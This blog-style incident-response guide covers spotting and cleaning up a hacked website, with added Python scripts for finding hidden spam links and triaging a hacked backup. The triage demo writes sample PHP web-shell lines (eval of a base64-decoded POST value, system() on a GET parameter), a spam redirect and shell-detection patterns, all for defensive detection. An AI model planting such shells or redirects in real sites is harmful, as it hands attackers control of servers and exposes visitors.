So, you have been hacked! You are not alone: hacked websites are increasingly common, and recent industry reports put the share of websites with critical security flaws above 70%. If it has not happened to you yet, it may well happen in the near future, and attackers may already be visiting your website looking for loopholes to exploit.
It is therefore essential for webmasters to take every reasonable precaution rather than remain low-hanging fruit for attackers. But what if you have already been hacked? Read on to learn how it happens and what actions you should take to get your website running again.
How do I know if I am hacked?
It does not require any special skills to spot the obvious cases. You browse your website as usual and find it defaced. The most common form is a page with a black background, a large logo and a message such as "Hacked by some_group_name".
In other cases, your visitors are redirected to unpleasant websites, typically porn or pharmaceutical spam. If you have seen any of the above, you have clearly been hacked. Smarter attackers, however, do not want you to know. They avoid flashy banners and logos and prefer that you remain unaware, so they can keep using your website for as long as possible to carry out their malicious intentions.
Nowadays, black-hat SEO spammers run campaigns to promote online stores that sell cheap "replicas" of popular luxury brands. The method stays largely the same, but the doorway pages are often optimized for the latest events and festivals; around Christmas, for example, the links read something like "Christmas specials cheap louis Vuitton".
Generally, such links point to the home page of an infected website. The compromised websites carry a block of hidden spammy links at the bottom of their HTML code, like the following:
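As an added example (not code from the original article), the following Python script finds exactly this kind of block: links sitting inside an element that is hidden with inline CSS (display:none, visibility:hidden, or pushed off-screen with a large negative offset) or with the HTML hidden attribute, and reports how many of them point off-site. The sample HTML and the .example hostnames are constructed for the demonstration.

```python
"""Find hidden link blocks of the kind black-hat SEO injections leave in a page.

Added example, not code from the original article. The sample HTML below is
constructed, and the .example hostnames are placeholders.
"""
from html.parser import HTMLParser
import re
from urllib.parse import urlparse

# Inline CSS that makes a container invisible or pushes it off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.I,
)
# Elements that never get a closing tag, so they must not enter the stack.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}


class HiddenLinkFinder(HTMLParser):
    """Collect every <a> that sits inside a hidden element (or is hidden itself)."""

    def __init__(self):
        super().__init__()
        self.stack = []          # one bool per open element: is it hidden?
        self.hidden_depth = 0    # number of hidden elements currently open
        self.total_links = 0
        self.hidden_links = []   # (href, anchor text)
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        a = dict(attrs)
        hidden = "hidden" in a or bool(HIDDEN_STYLE.search(a.get("style") or ""))
        self.stack.append(hidden)
        if hidden:
            self.hidden_depth += 1
        if tag == "a":
            self.total_links += 1
            self._href = a.get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if tag == "a" and self._href is not None:
            if self.hidden_depth > 0:
                self.hidden_links.append((self._href, "".join(self._text).strip()))
            self._href = None
        if self.stack and self.stack.pop():
            self.hidden_depth -= 1


def hidden_link_report(html, site_host):
    """Parse html and summarise hidden links; off-site ones are the spam signal."""
    parser = HiddenLinkFinder()
    parser.feed(html)
    parser.close()
    site_host = site_host.lower()
    external = [
        href for href, _ in parser.hidden_links
        if (urlparse(href).hostname or site_host).lower() != site_host
    ]
    return {
        "total_links": parser.total_links,
        "hidden_links": parser.hidden_links,
        "hidden_external": len(external),
    }


def is_suspicious(report, threshold=3):
    """Several hidden off-site links together is the doorway-page signature."""
    return report["hidden_external"] >= threshold


# Constructed sample: a normal page with an injected off-screen link block and a
# display:none block appended at the bottom, as the article describes.
SAMPLE_HTML = """<html><body>
<h1>Welcome to mywebsite.com</h1>
<p>See our <a href="/about">about page</a> and <a href="https://www.w3.org/">W3C</a>.</p>
<img src="logo.png">
<div style="position:absolute; left:-9999px;">
  <a href="http://replica-shop.example/">Christmas specials cheap louis Vuitton</a>
  <a href="http://replica-shop.example/bags">cheap replica handbags</a>
  <a href="http://pills.example/">cheap pills online</a>
</div>
<div style="display:none"><a href="http://spam.example/">ugg boots outlet</a></div>
</body></html>"""

if __name__ == "__main__":
    rep = hidden_link_report(SAMPLE_HTML, "mywebsite.com")
    print(f"{rep['hidden_external']} hidden off-site links of {rep['total_links']} total")
    for href, text in rep["hidden_links"]:
        print(f"  {text!r} -> {href}")
```

Run it against a saved copy of your home page (the rendered HTML, not just the template, since the injection may come from the database or a plugin) and treat any hidden off-site link as something to explain. The element stack assumes reasonably well-formed HTML; for the tag soup real templates produce, swap the parser for html5lib or BeautifulSoup and keep the same detection logic.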
You can also search for your website in Google or Bing using a query like:
site:yourdomain.com spammy-word, e.g. site:mywebsite.com cheap
If the search engine lists unusual pages with spammy links, you have been hacked by such parasites. In that case, scan your website with Sucuri SiteCheck and Unmask Parasites.
Rather than discussing each further, here is a short summary of the signs that indicate you have been hacked:
- Browsers warn that your website may be compromised.
- Your website's default page has been replaced by some flashy page.
- Your website redirects to offensive webpages.
- Search engines notify you that your website hosts malicious content.
- You notice strange webpages, or unusual code in your website's source.
- You are unable to log in to administrative areas even with the correct credentials, or find yourself locked out.
What could be the possible reasons behind this hack?
A website can be hacked in numerous ways. The following are some common methods attackers use:
- Guessing the password, or obtaining it through social engineering.
- Brute-forcing the username and password.
- Taking control of the backend dashboard of a CMS such as WordPress via SQL injection.
- Infecting your local computer with malware to capture your login credentials.
- Finding and exploiting a security vulnerability in specific software, an update, a plugin or a theme.
- Uploading web shells through insecure upload pages to gain control of the whole server.
- Hacking someone else's website that resides on the same shared server as yours.
What actions should be taken after being hacked?
- Scan your local computer for viruses and malware
To find the culprit, start with your local system: it is possible that the infection began on your own machine. Install a good anti-virus product and run a full scan to make sure your local system is not infected with malware, spyware, Trojans and the like. Before running the full scan, make sure the anti-virus software is up to date with the latest definitions. For Windows, we recommend Microsoft Security Essentials, as it provides real-time protection against the latest threats. Do this before changing any passwords: new credentials typed on an infected machine are captured just like the old ones.
- Change all passwords
Change the passwords for all users and all accounts: FTP access, hosting control panel accounts, the administrator account, and content management system authoring accounts. Review the list of your website's user accounts and make sure the attacker has not created any new ones. If you find unknown accounts, note them down (username, e-mail address, creation date) for later investigation, then delete them immediately to prevent further logins by the attacker.
- Take your website offline
Once you know you have been hacked, take the website offline immediately, both to stop it infecting visitors and to stop the attacker abusing the system further. Back up the infected website files and MySQL databases before you change anything, and rename the copy as the hacked backup. File timestamps and logs are the evidence you will need, so take the copy first; you can then investigate it later at leisure, or fall back to it if your cleanup attempt fails.
- Immediately contact your web host
If you are on shared hosting, contact your web host to determine whether the hack has affected other websites on the same server. Ask whether they hold a good backup of your database and website files; if they do, ask them to secure it before it gets overwritten by a later backup run. If you have a clean backup of your files on your local system, consider restoring from that.
- Web content cleanup and post-hack investigation
Now open the hacked backup folder for post-hack analysis. First, review the web content folders and files and their modification times. Prepare a list of recently modified folders and files, check whether any new file has been inserted into a modified folder, and establish exactly what was changed in each modified file. Bear in mind that an attacker can reset modification times, so an old timestamp is not proof that a file is clean.
If you find malicious code inserted into files, or files that do not belong to your website, remove or repair them. You can also run a full scan of the web files with up-to-date anti-virus/anti-malware software. Repair or quarantine the affected code if possible, or restore from the last known-good backup.
Note the timestamps at which these files were modified; they narrow down the log search. Digging through logs is the primary investigation step in any hack incident, but it requires administrative access. If you have it, check the Event Viewer (Windows) or the relevant web server, FTP and authentication logs. Look for repeated failed login attempts and for FTP logins from unknown IP addresses.
If your website had an upload page without file validation or a captcha, that could be the culprit. Check the upload path for shell scripts or other malicious code. Verify the list of user accounts; if you find an unknown account, disable it immediately and search the logs for its recent activity.
Check your .htaccess file, index files and any other default pages for malicious redirects or other ill-intentioned code. If you run a WordPress blog, check the wp-content/themes directory, in particular index.php, header.php, footer.php and functions.php.
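The cleanup and investigation steps above can be scripted against the hacked backup. As an added example (not code from the original article), the following Python script lists files modified after a cut-off time, flags the usual web-shell indicators and PHP files under an upload directory, checks .htaccess for injected redirects, and counts probable failed WordPress logins per IP from access-log lines. The sample site in the temp directory and the log lines are constructed; the "POST to wp-login.php answered with 200 means a failed login" rule is a heuristic assumption, not something the article states.

```python
"""Post-hack triage of an offline copy of a hacked site. Added example, not the
article's code: it builds a throwaway sample site in a temp directory and uses
constructed access-log lines; point triage() at your own hacked-backup folder."""
import os, re, shutil, tempfile, time
from collections import Counter

# Heuristic indicators of injected PHP or web shells: a hit means "read this file by hand".
SHELL_INDICATORS = {
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "command_exec_from_request": re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I),
    "htaccess_redirect": re.compile(
        r"^\s*(?:Redirect(?:Match)?\s+30[12]\s|RewriteRule\s.*\shttps?://)", re.I | re.M),
}
UPLOAD_DIRS = {"uploads", "upload", "files"}  # PHP under these is almost never legitimate
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def recently_modified(root, since_ts):
    """Files under root with mtime >= since_ts, newest first. Caveat: attackers can
    reset mtimes, so an old timestamp is not proof that a file is clean."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            if mtime >= since_ts:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), mtime))
    return sorted(hits, key=lambda h: h[1], reverse=True)


def scan_file(root, relpath):
    """Names of the indicators that fire on one file (path check first, then content)."""
    parts = relpath.split("/")
    findings = []
    if parts[-1].lower().endswith((".php", ".phtml", ".php5")) and UPLOAD_DIRS & set(parts[:-1]):
        findings.append("php_file_in_upload_dir")
    with open(os.path.join(root, relpath), encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings += [name for name, pat in SHELL_INDICATORS.items() if pat.search(text)]
    return findings


def failed_wp_logins(log_lines):
    """Probable failed WordPress logins per source IP from combined-format log lines.
    Assumption: a POST to wp-login.php answered with 200 re-rendered the login form
    (a failure); a successful login answers with a 302 redirect instead."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].startswith("/wp-login.php") and m["status"] == "200":
            counts[m["ip"]] += 1
    return counts


def triage(root, since_ts, log_lines):
    """Recent files with their indicators, plus login-failure counts per IP."""
    recent = {}
    for rel, mtime in recently_modified(root, since_ts):
        recent[rel] = {"mtime": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(mtime)),
                       "indicators": scan_file(root, rel)}
    return {"recent_files": recent, "failed_logins": failed_wp_logins(log_lines)}


# Constructed sample data: three brute-force failures then a success from one IP, and
# a clean theme file beside an injected footer, an upload-dir shell and a redirect.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Dec/2012:03:14:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2012:03:14:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2012:03:14:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2012:03:14:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2012:09:00:00 +0000] "GET /index.php HTTP/1.1" 200 8822 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2012:09:01:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
""".splitlines()
SAMPLE_FILES = {  # relative path: (content, age in days)
    "wp-content/themes/mytheme/index.php": ("<?php get_header(); ?>\n<h1>Hello</h1>\n", 30),
    "wp-content/themes/mytheme/footer.php": ("<?php wp_footer(); eval(base64_decode($_POST['x'])); ?>\n", 0),
    "wp-content/uploads/2012/12/photo.php": ("<?php system($_GET['cmd']); ?>\n", 0),
    ".htaccess": ("RewriteEngine On\nRewriteRule ^(.*)$ http://spam.example/$1 [R=302,L]\n", 0),
}


def run_demo():
    """Build the sample hacked-backup folder in a temp dir, triage it, clean up."""
    root = tempfile.mkdtemp(prefix="hacked_backup_")
    try:
        for rel, (content, age_days) in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
            stamp = time.time() - age_days * 86400
            os.utime(path, (stamp, stamp))
        return triage(root, time.time() - 7 * 86400, SAMPLE_LOG)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    report = run_demo()
    for rel, info in report["recent_files"].items():
        print(info["mtime"], rel, info["indicators"])
    print("failed wp-login POSTs per IP:", dict(report["failed_logins"]))
```

On a real incident, call triage() with the backup folder, a cut-off a little before the earliest suspicious timestamp you found, and the lines of your access log; the unmodified index.php in the sample shows why the cut-off matters, and the 302 line shows why a single IP with many 200s followed by one 302 is the brute-force-then-success pattern to look for.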
The most common reasons behind hacks are poor coding, outdated and insecure scripts, plugins and themes, and insecure upload pages. To prevent a recurrence, you must address all of these possible culprits.
Conclusion
There are numerous ways of being hacked and just as many investigation techniques; the list above is only the tip of the iceberg. The first step in any hack incident is to contact your hosting provider: they are usually best placed to do most of the heavy technical work for you. Getting a website hacked is no fun, so keep calm and brief the support team so you can get it running again as soon as possible.
I must say this is a very useful article that helps us understand the need to know what to do in case your website is hacked.
I would like to add a few more things; for example, we need to be proactive in order to handle situations like that.
I suggest the following:
(1) You must know what the most important information is and where it is stored on your website.
(2) Please keep regular backups and test-run restores at regular intervals.
(3) Consider preparing a "to-do checklist" before something happens, based on the above article, and follow the steps as soon as you realize your website is hacked.
(4) Finally, don't panic; just make sure you have done the homework before this happens, as it may not always be a loophole in the website code; it can be anything else, such as a third-party service or protocol being exploited.
(5) Try to improve the time you take to restore a website after it gets hacked by using different strategies if possible.
(6) Think of it like doing a fire drill: if you are well prepared, then you may be able to avoid big damage if everything goes according to plan.